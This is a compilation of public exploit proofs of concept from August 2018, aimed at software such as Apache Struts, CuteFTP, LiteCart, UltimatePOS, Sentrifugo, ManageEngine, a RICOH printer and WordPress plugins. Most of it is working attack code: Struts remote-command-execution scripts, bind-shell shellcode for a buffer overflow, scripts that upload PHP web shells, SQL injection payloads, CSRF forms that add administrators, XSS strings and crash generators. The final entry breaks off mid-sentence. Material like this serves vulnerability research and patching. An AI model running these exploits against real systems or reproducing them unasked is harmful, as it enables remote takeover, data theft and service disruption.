# Exploit Title: SkypeApp 12.8.487.0 - 'Cuenta de Skype o Microsoft' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-08-23
# Vendor Homepage: https://www.skype.com/es/home/
# Tested Version: 12.8.487.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash: 
# 1.- Run python code : python SkypeApp_12.8.487.0.py
# 2.- Open SkypeApp_12.8.487.0.txt and copy content to clipboard
# 3.- Open SkypeApp.exe
# 4.- Paste ClipBoard on "Cuenta de Skype o Microsoft"
# 5.- Siguiente
# 6.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 65225
f = open ("SkypeApp_12.8.487.0.txt", "w")
f.write(buffer)
f.close()

#!/usr/bin/python
# -*- coding: utf-8 -*-

# hook-s3c (github.com/hook-s3c), @hook_s3c on twitter

import sys
import urllib
import urllib2
import httplib


def exploit(host,cmd):
    print "[Execute]: {}".format(cmd)

    ognl_payload = "${"
    ognl_payload += "(#_memberAccess['allowStaticMethodAccess']=true)."
    ognl_payload += "(#cmd='{}').".format(cmd)
    ognl_payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    ognl_payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'bash','-c',#cmd}))."
    ognl_payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    ognl_payload += "(#p.redirectErrorStream(true))."
    ognl_payload += "(#process=#p.start())."
    ognl_payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    ognl_payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    ognl_payload += "(#ros.flush())"
    ognl_payload += "}"

    if not ":" in host:
        host = "{}:8080".format(host)

    # encode the payload
    ognl_payload_encoded = urllib.quote_plus(ognl_payload)

    # further encoding
    url = "http://{}/{}/help.action".format(host, ognl_payload_encoded.replace("+","%20").replace("", "%20").replace("%2F","/"))

    print "[Url]: {}\n\n\n".format(url)

    try:
        request = urllib2.Request(url)
        response = urllib2.urlopen(request).read()
    except httplib.IncompleteRead, e:
        response = e.partial
    print response


if len(sys.argv) < 3:
    sys.exit('Usage: %s <host:port> <cmd>' % sys.argv[0])
else:
    exploit(sys.argv[1],sys.argv[2])

#!/usr/bin/env python3
# coding=utf-8
# *****************************************************
# struts-pwn: Apache Struts CVE-2018-11776 Exploit
# Author:
# Mazin Ahmed <Mazin AT MazinAhmed DOT net>
# This code uses a payload from:
# https://github.com/jas502n/St2-057
# *****************************************************

import argparse
import random
import requests
import sys
try:
    from urllib import parse as urlparse
except ImportError:
    import urlparse

# Disable SSL warnings
try:
    import requests.packages.urllib3
    requests.packages.urllib3.disable_warnings()
except Exception:
    pass

if len(sys.argv) <= 1:
    print('[*] CVE: 2018-11776 - Apache Struts2 S2-057')
    print('[*] Struts-PWN - @mazen160')
    print('\n%s -h for help.' % (sys.argv[0]))
    exit(0)


parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url",
                    dest="url",
                    help="Check a single URL.",
                    action='store')
parser.add_argument("-l", "--list",
                    dest="usedlist",
                    help="Check a list of URLs.",
                    action='store')
parser.add_argument("-c", "--cmd",
                    dest="cmd",
                    help="Command to execute. (Default: 'id')",
                    action='store',
                    default='id')
parser.add_argument("--exploit",
                    dest="do_exploit",
                    help="Exploit.",
                    action='store_true')


args = parser.parse_args()
url = args.url if args.url else None
usedlist = args.usedlist if args.usedlist else None
cmd = args.cmd if args.cmd else None
do_exploit = args.do_exploit if args.do_exploit else None

headers = {
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)',
    # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Accept': '*/*'
}
timeout = 3


def parse_url(url):
"""
    Parses the URL.
"""

    # url: http://example.com/demo/struts2-showcase/index.action

    url = url.replace('#', '%23')
    url = url.replace('', '%20')

    if ('://' not in url):
        url = str("http://") + str(url)
    scheme = urlparse.urlparse(url).scheme

    # Site: http://example.com
    site = scheme + '://' + urlparse.urlparse(url).netloc

    # FilePath: /demo/struts2-showcase/index.action
    file_path = urlparse.urlparse(url).path
    if (file_path == ''):
        file_path = '/'

    # Filename: index.action
    try:
        filename = url.split('/')[-1]
    except IndexError:
        filename = ''

    # File Dir: /demo/struts2-showcase/
    file_dir = file_path.rstrip(filename)
    if (file_dir == ''):
        file_dir = '/'

    return({"site": site,
"file_dir": file_dir,
"filename": filename})


def build_injection_inputs(url):
"""
    Builds injection inputs for the check.
"""

    parsed_url = parse_url(url)
    injection_inputs = []
    url_directories = parsed_url["file_dir"].split("/")

    try:
        url_directories.remove("")
    except ValueError:
        pass

    for i in range(len(url_directories)):
        injection_entry = "/".join(url_directories[:i])

        if not injection_entry.startswith("/"):
            injection_entry = "/%s" % (injection_entry)

        if not injection_entry.endswith("/"):
            injection_entry = "%s/" % (injection_entry)

        injection_entry += "{{INJECTION_POINT}}/"  # It will be renderred later with the payload.
        injection_entry += parsed_url["filename"]

        injection_inputs.append(injection_entry)

    return(injection_inputs)


def check(url):
    random_value = int(''.join(random.choice('0123456789') for i in range(2)))
    multiplication_value = random_value * random_value
    injection_points = build_injection_inputs(url)
    parsed_url = parse_url(url)
    print("[%] Checking for CVE-2018-11776")
    print("[*] URL: %s" % (url))
    print("[*] Total of Attempts: (%s)" % (len(injection_points)))
    attempts_counter = 0

    for injection_point in injection_points:
        attempts_counter += 1
        print("[%s/%s]" % (attempts_counter, len(injection_points)))
        testing_url = "%s%s" % (parsed_url["site"], injection_point)
        testing_url = testing_url.replace("{{INJECTION_POINT}}", "${{%s*%s}}" % (random_value, random_value))
        try:
            resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
        except Exception as e:
            print("EXCEPTION::::--> " + str(e))
            continue
        if "Location" in resp.headers.keys():
            if str(multiplication_value) in resp.headers['Location']:
                print("[*] Status: Vulnerable!")
                return(injection_point)
    print("[*] Status: Not Affected.")
    return(None)


def exploit(url, cmd):
    parsed_url = parse_url(url)

    injection_point = check(url)
    if injection_point is None:
        print("[%] Target is not vulnerable.")
        return(0)
    print("[%] Exploiting...")

    payload = """%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D""".format(cmd)

    testing_url = "%s%s" % (parsed_url["site"], injection_point)
    testing_url = testing_url.replace("{{INJECTION_POINT}}", payload)

    try:
        resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
    except Exception as e:
        print("EXCEPTION::::--> " + str(e))
        return(1)

    print("[%] Response:")
    print(resp.text)
    return(0)


def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):
    if url:
        if not do_exploit:
            check(url)
        else:
            exploit(url, cmd)

    if usedlist:
        URLs_List = []
        try:
            f_file = open(str(usedlist), "r")
            URLs_List = f_file.read().replace("\r", "").split("\n")
            try:
                URLs_List.remove("")
            except ValueError:
                pass
            f_file.close()
        except Exception as e:
            print("Error: There was an error in reading list file.")
            print("Exception: " + str(e))
            exit(1)
        for url in URLs_List:
            if not do_exploit:
                check(url)
            else:
                exploit(url, cmd)

    print("[%] Done.")


if __name__ == "__main__":
    try:
        main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)
    except KeyboardInterrupt:
        print("\nKeyboardInterrupt Detected.")
        print("Exiting...")
        exit(0)

# Exploit Title: Firefox 55.0.3 - Denial of Service (PoC)
# Date: 2018-08-26
# Exploit Author: L0RD
# Vendor Homepage: mozilla.org
# Software Link: https://www.mozilla.org/en-US/firefox/55.0.3/releasenotes/
# Version: 55.0.3
# Tested on: Windows 10
# CVE: N/A

# Description :
# An issue was discovered in firefox 55.0.3 which an attacker can create a
# webpage and put javascript payload to crash user's browser or put user in
# non-responsive state.

# Exploit :

/* We don't need to create any element on webpage.we just set body
attribute with our buffer variable*/
<script>
var buffer = "";
for(var i=0;i<0x11170;i++){
for(j=0;j<=0x9C40;j++){
buffer += "\x44";
}
}
document.body.style.backgroundColor = buffer;
</script>

# Exploit Title: RICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2018-08-21 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.ricoh.com/
# Hardware Link : https://www.ricoh-usa.com/en/products/pd/equipment/printers-and-copiers/multifunction-printers-copiers/mp-c4504ex-color-laser-multifunction-printer/_/R-417998
# Software : RICOH Printer
# Product Version:  MP C4504ex
# Vulernability Type : Code Injection
# Vulenrability : HTML Injection
# CVE : CVE-2018-15884

# CSRF vulnerability has been discovered on the printer of MP C4504ex of RICOH product.
# Low priviliage users are able to create administrator accounts

HTTP POST Request :

POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.10/web/entry/en/address/adrsList.cgi
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 193
Cookie: risessionid=132072532817225; cookieOnOffChecker=on; wimsesid=103007361
Connection: close

mode=ADDUSER&step=BASE&wimToken=2051165463&entryIndexIn=00007&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1

HTTP Response Request :

GET /success.txt HTTP/1.1
Host: detectportal.firefox.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Pragma: no-cache
Connection: close

# Exploit Title: Sentrifugo HRMS 3.2 - 'deptid' SQL Injection
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com
# Date: 2018-08-26
# Google Dork: N/A
# Vendor: http://www.sapplica.com
# Software Link: http://www.sentrifugo.com/download
# Affected Version: 3.2 and possibly before
# Patched Version: unpatched
# Category: Web Application
# Platform: PHP
# Tested on: Win10x64 & Kali Linux
# CVE: N/A

# 1. Technical Description:
# Sentrifugo HRMS version 3.2 and possibly before are affected by Blind SQL Injection in deptid
# parameter through POST request in "/index.php/servicedeskconf/getemployees/format/html" resource.
# This allows a user of the application without permissions to read sensitive information from
# the database used by the application.

# 2. Proof Of Concept (PoC):
# 2.1 The following POST request generates an error 500 in the Application (add ' in deptid parameter)

POST /sentrifugo/index.php/servicedeskconf/getemployees/format/html HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html, */*; q=0.01
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/sentrifugo/index.php/servicedeskconf/add
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 28
Cookie: PHPSESSID=25kchrvj0e3akklgh0inrubqu0
Connection: close

bunitid=0&deptid='&reqfor=2

# 2.2 In another request, add two ' to receive a code 200 OK

POST /sentrifugo/index.php/servicedeskconf/getemployees/format/html HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html, */*; q=0.01
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/sentrifugo/index.php/servicedeskconf/add
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 28
Cookie: PHPSESSID=25kchrvj0e3akklgh0inrubqu0
Connection: close

bunitid=0&deptid=''&reqfor=2

# 3. Payload:

Parameter: deptid (POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: bunitid=0&deptid=(SELECT (CASE WHEN (5610=5610) THEN 5610 ELSE 5610*(SELECT 5610 FROM INFORMATION_SCHEMA.PLUGINS) END))&reqfor=2

# 4. Reference:
# https://hackpuntes.com/cve-2018-15873-sentrifugo-hrms-3-2-blind-sql-injection/

# Exploit Title: CuteFTP 5.0 - Buffer Overflow
# Author: Matteo Malvica
# Date: 2018-08-26
# Vendor homepage: www.globalscape.com
# Software: CuteFTP 5.0.4 XP - build 54.8.6.1
# Software Link: http://installer.globalscape.com/pub/cuteftp/archive/english/cuteftp50.exe
# Tested on: Windows XP Profesional SP3 English x86

# STEPS:
# 1. The python script will generate an 'exploit.txt' file.
# 2. Start CuteFTP
# 3. In the program menu click "File"> "Site Manager"> "New" and paste the content of
# the exploit file into the 'label' field and provide a dummy IP addresss.
# 4. Right click on the site name and 'create shortcut'
# 5. Rename the shortcut to whatever name you prefer: this will create an exe that automates exploit loading upon clicking.
# 6. Quit CuteFTP and launch the newly created 'shortcut'.exe
# 7. $ nc [target_ip] 6666
# 8. celebrate moderately

ret="\xD8\xFC\x91\x7C"  #ntdll.dll 7C91FCD8
nops = '\x90'*30

#msfvenom -p windows/shell_bind_tcp LPORT=6666 -b '\x0a\x00\x0d' -f python
sc =  ""
sc += "\xdb\xd8\xb8\xa7\x37\x29\x0e\xd9\x74\x24\xf4\x5b\x33"
sc += "\xc9\xb1\x53\x31\x43\x17\x83\xeb\xfc\x03\xe4\x24\xcb"
sc += "\xfb\x16\xa2\x89\x04\xe6\x33\xee\x8d\x03\x02\x2e\xe9"
sc += "\x40\x35\x9e\x79\x04\xba\x55\x2f\xbc\x49\x1b\xf8\xb3"
sc += "\xfa\x96\xde\xfa\xfb\x8b\x23\x9d\x7f\xd6\x77\x7d\x41"
sc += "\x19\x8a\x7c\x86\x44\x67\x2c\x5f\x02\xda\xc0\xd4\x5e"
sc += "\xe7\x6b\xa6\x4f\x6f\x88\x7f\x71\x5e\x1f\x0b\x28\x40"
sc += "\x9e\xd8\x40\xc9\xb8\x3d\x6c\x83\x33\xf5\x1a\x12\x95"
sc += "\xc7\xe3\xb9\xd8\xe7\x11\xc3\x1d\xcf\xc9\xb6\x57\x33"
sc += "\x77\xc1\xac\x49\xa3\x44\x36\xe9\x20\xfe\x92\x0b\xe4"
sc += "\x99\x51\x07\x41\xed\x3d\x04\x54\x22\x36\x30\xdd\xc5"
sc += "\x98\xb0\xa5\xe1\x3c\x98\x7e\x8b\x65\x44\xd0\xb4\x75"
sc += "\x27\x8d\x10\xfe\xca\xda\x28\x5d\x83\x2f\x01\x5d\x53"
sc += "\x38\x12\x2e\x61\xe7\x88\xb8\xc9\x60\x17\x3f\x2d\x5b"
sc += "\xef\xaf\xd0\x64\x10\xe6\x16\x30\x40\x90\xbf\x39\x0b"
sc += "\x60\x3f\xec\xa6\x68\xe6\x5f\xd5\x95\x58\x30\x59\x35"
sc += "\x31\x5a\x56\x6a\x21\x65\xbc\x03\xca\x98\x3f\x31\x01"
sc += "\x14\xd9\x2f\x05\x70\x71\xc7\xe7\xa7\x4a\x70\x17\x82"
sc += "\xe2\x16\x50\xc4\x35\x19\x61\xc2\x11\x8d\xea\x01\xa6"
sc += "\xac\xec\x0f\x8e\xb9\x7b\xc5\x5f\x88\x1a\xda\x75\x7a"
sc += "\xbe\x49\x12\x7a\xc9\x71\x8d\x2d\x9e\x44\xc4\xbb\x32"
sc += "\xfe\x7e\xd9\xce\x66\xb8\x59\x15\x5b\x47\x60\xd8\xe7"
sc += "\x63\x72\x24\xe7\x2f\x26\xf8\xbe\xf9\x90\xbe\x68\x48"
sc += "\x4a\x69\xc6\x02\x1a\xec\x24\x95\x5c\xf1\x60\x63\x80"
sc += "\x40\xdd\x32\xbf\x6d\x89\xb2\xb8\x93\x29\x3c\x13\x10"
sc += "\x59\x77\x39\x31\xf2\xde\xa8\x03\x9f\xe0\x07\x47\xa6"
sc += "\x62\xad\x38\x5d\x7a\xc4\x3d\x19\x3c\x35\x4c\x32\xa9"
sc += "\x39\xe3\x33\xf8"

buffer = "A" * 520+ ret + nops + sc + "C" * (3572 - len(sc))
payload = buffer
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s recreational bytes..." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

# Exploit Title: LiteCart 2.1.2 - Arbitrary File Upload
# Date: 2018-08-27
# Exploit Author: Haboob Team
# Software Link: https://www.litecart.net/downloading?version=2.1.2
# Version: 2.1.2
# CVE : CVE-2018-12256

# 1. Description
# admin/vqmods.app/vqmods.inc.php in LiteCart 2.1.2 allows remote authenticated attackers 
# to upload a malicious file (resulting in remote code execution) by using the text/xml 
# or application/xml Content-Type in a public_html/admin/?app=vqmods&doc=vqmods request.

# 2. Proof of Concept

#!/usr/bin/env python
import mechanize
import cookielib
import urllib2
import requests
import sys
import argparse
import random
import string
parser = argparse.ArgumentParser(description='LiteCart')
parser.add_argument('-t',
                    help='admin login page url - EX: https://IPADDRESS/admin/')
parser.add_argument('-p',
                    help='admin password')
parser.add_argument('-u',
                    help='admin username')
args = parser.parse_args()
if(not args.u or not args.t or not args.p):
    sys.exit("-h for help")
url = args.t
user = args.u
password = args.p

br = mechanize.Browser()
cookiejar = cookielib.LWPCookieJar()
br.set_cookiejar( cookiejar )
br.set_handle_equiv( True )
br.set_handle_redirect( True )
br.set_handle_referer( True )
br.set_handle_robots( False )
br.addheaders = [ ( 'User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1' ) ]
response = br.open(url)
br.select_form(name="login_form")
br["username"] = user
br["password"] = password
res = br.submit()
response = br.open(url + "?app=vqmods&doc=vqmods")
one=""
for form in br.forms():
    one= str(form).split("(")
    one= one[1].split("=")
    one= one[1].split(")")
    one = one[0]
cookies = br._ua_handlers['_cookies'].cookiejar
cookie_dict = {}
for c in cookies:
    cookie_dict[c.name] = c.value
rand = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(5))
files = {
'vqmod': (rand + ".php", "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); } ?>", "application/xml"),
'token':one,
'upload':(None,"Upload")
    }
response = requests.post(url + "?app=vqmods&doc=vqmods", files=files, cookies=cookie_dict)
r = requests.get(url + "../vqmod/xml/" + rand + ".php?c=id")
if r.status_code == 200:
    print "Shell => " + url + "../vqmod/xml/" + rand + ".php?c=id"
    print r.content
else:
    print "Sorry something went wrong"

# Exploit Title: Gleez CMS 1.2.0 - Cross-Site Request Forgery (Add Admin)
# Date: 2018-08-24
# Exploit Author: GunEggWang
# Vendor Homepage: https://gleezcms.org/
# Software Link: https://github.com/gleez/cms
# Version: 1.2.0
# CVE : CVE-2018-15845

# Description: 
# There is a CSRF vulnerability that can add an administrator account in 
# Gleez CMS 1.2.0 via admin/users/add. (https://github.com/gleez/cms/issues/800)
# After the administrator logged in,open the POC,that will create an new admin account unexcused.
# POC:

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.gleezcms.org/admin/users/add?0=" method="POST">
<input type="hidden" name="_token" value="18eabd0645699b3eec1686301a684392e8a4735a" />
<input type="hidden" name="_action" value="909998bbc9e60ce40ae378a1055b46f3" />
<input type="hidden" name="name" value="test" />
<input type="hidden" name="pass" value="test" />
<input type="hidden" name="nick" value="test" />
<input type="hidden" name="mail" value="admin@admin.cc" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="roles[admin]" value="Administrative user, has access to everything." />
<input type="hidden" name="site_url" value="http://demo.gleezcms.org/" />
<input type="hidden" name="user" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

# Exploit Title: ManageEngine ADManager Plus 6.5.7 - HTML Injection
# Date: 2018-08-21 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.manageengine.com/
# Hardware Link : https://www.manageengine.com/products/ad-manager/
# Software : ZOHO Corp ManageEngine ADManager Plus
# Product Version:  6.5.7
# Vulernability Type : Code Injection
# Vulenrability : HTML Injection
# CVE : CVE-2018-15608

# ZOHO Corp ManageEngine ADManager Plus 6.5.7 allows HTML Injection on 
# the "AD Delegation""Help Desk Technicians" screen.

# HTTP Request Header :

Request URL: http://172.16.2.105:8080/ADMPTechnicians.do?methodToCall=listTechnicianRows
Request Method: POST
Status Code: 200 OK
Remote Address: 172.16.2.105:8080
Referrer Policy: no-referrer-when-downgrade
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive
Content-Length: 301
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Cookie: adscsrf=614ff642-779b-41aa-bff5-44370ad770c2; JSESSIONID=79DE1A7AE1DC5B7D88FCBF02AB425987; JSESSIONIDSSO=19AA1682A937F344D1DCB190B31343FB
Host: 172.16.2.105:8080
Origin: http://172.16.2.105:8080
Referer: http://172.16.2.105:8080/Delegation.do?selectedTab=delegation&selectedTile=technicians
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
X-Requested-With: XMLHttpRequest

# HTTP Response Header :

Content-Length: 3753
Content-Type: text/html;charset=UTF-8
Date: Tue, 14 Aug 2018 10:14:32 GMT
Server: Apache-Coyote/1.1
X-Content-Type-Options: nosniff
X-XSS-Protection: 1

# Query String Parameters :

methodToCall: listTechnicianRows

# Form Data :

params: {"startIndex":1,"range":10,"searchText":"\"><h1>Ismail Tasdelen</h1>","ascending":true,"isNavigation":false,"adminSelected":false,"isNewRange":false,"sortColumn":FULL_NAME,"typeFilters":"","domainFilters":"","viewType":defaultView}
adscsrf: 614ff642-779b-41aa-bff5-44370ad770c2

# Exploit Title: UltimatePOS 2.5 - Remote Code Execution
# Google Dork: intext:"UltimatePOS"
# Date: 2018-08-22
# Exploit Author: Renos Nikolaou
# Vendor Homepage: http://ultimatefosters.com/
# Software Link: https://codecanyon.net/item/saas-superadmin-module-for-ultimatepos-advance/22394431
# Version: 2.5
# Tested on: Windows 10
# CVE: N/A
# Description : UltimatePOS 2.5 allows users to upload arbitrary files which 
# leads to a remote command execution on the remote server.

# PoC
# 1) Create a file with the below PHP code and save it as jpg

<?php $cmd=$_GET['cmd']; system($cmd); ?>

# 2) Login to UltimatePOS portal as low priviliage user
# 3) At the left hand side go to Products --> List Products ( http://domain/products )
# 4) Click at the Actions button of a current product --> Edit
# (NOTE: Attack works if you add new product as well)
# 5) Under Product image: click Browse and upload your jpg file containing the PHP code mentioned at step 1. 
# (Make sure to use proxy like Burp, Fiddler etc..etc)
# 6) Scroll Down, click Update and Intercept the request using proxy
# 7) Forward the requests until you reach the from request containing the product details 
# (See the request below) including the filename of the file that you have uploaded.
# 8) Edit the filename from filename.jpg to filename.php and then release the Interception.
# 9) Go to the List Products again (Step 3) and fine the product that you have edited.
# 10) Right click at the Product image and select Copy image Location
# 11) Paste the URL into your browser. Will be similar to: http://domain/storage/img/1533988576_cmd.php
# 12) Verify the exploit: http://domain/storage/img/1533988576_cmd.php?cmd=id


# The request:
===================

POST /products/64 HTTP/1.1
Host: domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://domain.com/products/64/edit
Cookie: 
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------3062816822434
Content-Length: 2868

...

50
-----------------------------3062816822434
Content-Disposition: form-data; name="image"; filename="cmd.php"
Content-Type: image/jpeg

<?php $cmd=$_GET['cmd']; system($cmd); ?>

-----------------------------3062816822434
Content-Disposition: form-data; name="weight"

pos_confirmed.PNG

...

# Exploit Title: ManageEngine ADManager Plus 6.5.7 - Stored XSS
# Date: 2018-08-21 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.manageengine.com/
# Hardware Link : https://www.manageengine.com/products/ad-manager/
# Software : ZOHO Corp ManageEngine ADManager Plus
# Product Version:  6.5.7
# Vulernability Type : Cross-site Scripting
# Vulenrability : Stored XSS
# CVE : CVE-2018-15740

# Zoho ManageEngine ADManager Plus 6.5.7 has XSS on the "Workflow Delegation""Requester Roles" screen.

# HTTP Reuquest Header :

Request URL: http://172.16.2.105:8080/RequesterRoles.do?selectedTab=workflow&methodToCall=ShowReqRoleResultRows
Request Method: POST
Status Code: 200 OK
Remote Address: 172.16.2.105:8080
Referrer Policy: no-referrer-when-downgrade
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive
Content-Length: 240
Content-type: application/x-www-form-urlencoded;charset=UTF-8
Cookie: adscsrf=614ff642-779b-41aa-bff5-44370ad770c2; JSESSIONID=79DE1A7AE1DC5B7D88FCBF02AB425987; JSESSIONIDSSO=19AA1682A937F344D1DCB190B31343FB
Host: 172.16.2.105:8080
Origin: http://172.16.2.105:8080
Referer: http://172.16.2.105:8080/RequesterRoles.do?methodToCall=viewRequestersRole&selectedTab=workflow&selectedTile=RequestorsRole&operation=view
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
X-Requested-With: XMLHttpRequest

# Query String Parameters :

selectedTab: workflow
methodToCall: ShowReqRoleResultRows

# Form Data :

params: {"startIndex":0,"range":25,"toIndex":0,"searchText":"\"><img src=x onerror=alert('ismailtasdelen')>","ascending":true,"sortColumn":REQUESTER_ROLE_NAME,"isNewRange":false}
adscsrf: 614ff642-779b-41aa-bff5-44370ad770c2

# Exploit Title: WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection
# Google Dork: intext:"/wp-content/plugins/gift-voucher/"
# Date: 2018-08-23
# Exploit Author: Renos Nikolaou
# Software Link: https://wordpress.org/plugins/gift-voucher/
# Vendor Homepage: http://www.codemenschen.at/
# Version: 1.0.5
# Tested on: Windows 10
# CVE: N/A
# Description : The vulnerability allows an attacker to inject sql commands 
# on 'template_id' parameter.

# PoC - Blind SQLi :

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://domain.com/gift-voucher/
Content-Length: 62
Cookie: PHPSESSID=efa4of1gq42g0nd9nmj8dska50; __stripe_mid=1f8c5bef-b440-4803-bdd5-f0d0ea22007e; __stripe_sid=de547b6b-fa31-46a1-972b-7b3324272a23
Connection: close

action=wpgv_doajax_front_template&template_id=1 and sleep(15)#

Parameter: template_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=wpgv_doajax_front_template&template_id=1 AND 4448=4448
    Vector: AND [INFERENCE]
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
banner:    '5.5.59'

# Exploit Title: Trend Micro Enterprise Mobile Security 2.0.0.1700 - 'Servidor' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-08-26
# Vendor Homepage: https://www.trendmicro.com/en_se/business/products/user-protection/sps/mobile.html
# Software Link: App Store for iOS devices
# Tested Version: 2.0.0.1700
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 11.4.1

# Steps to Produce the Crash:
# 1.- Run python code: Enterprise_Mobile_Security_2.0.0.1700.py
# 2.- Copy content to clipboard
# 3.- Open App Enterprise Mobile Security
# 4.- Inscribirse manualmente
# 5.- Servidor local
# 6.- Paste ClipBoard on "Servidor:"
# 7.- Puerto: 80
# 8.- Siguiente
# 9.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 153844
print (buffer)

# Exploit Title: Libpango 1.40.8 - Denial of Service (PoC)
# Date: 2018-08-06
# Exploit Author: Jeffery M
# Vendor Homepage: https://www.pango.org/
# Software Link: http://ftp.gnome.org/pub/GNOME/sources/pango/1.40/pango-1.40.9.tar.xz
# Version: 1.40.8+
# Tested on: Windows 7, Gentoo
# CVE : CVE-2018-15120

# Patch : https://github.com/GNOME/pango/commit/71aaeaf020340412b8d012fe23a556c0420eda5f

# Description:
# Invalid Unicode sequences, such as 0x2665 0xfe0e 0xfe0f, can trick the
# Emoji iter code into returning an empty segment, which then triggers
# an assertion in the itemizer.

# POC:
# Save the below as irc_com_dump; chmod +x irc_com_dump;connect to an
# irc server with something linked against libpango 1.40.8 or higher
# (e.g. hexchat 2.14.1 [ can be obtained on my server
# http://order.a.whore.website/HexChat%202.14.1%20x86.exe ), then run
# the following:

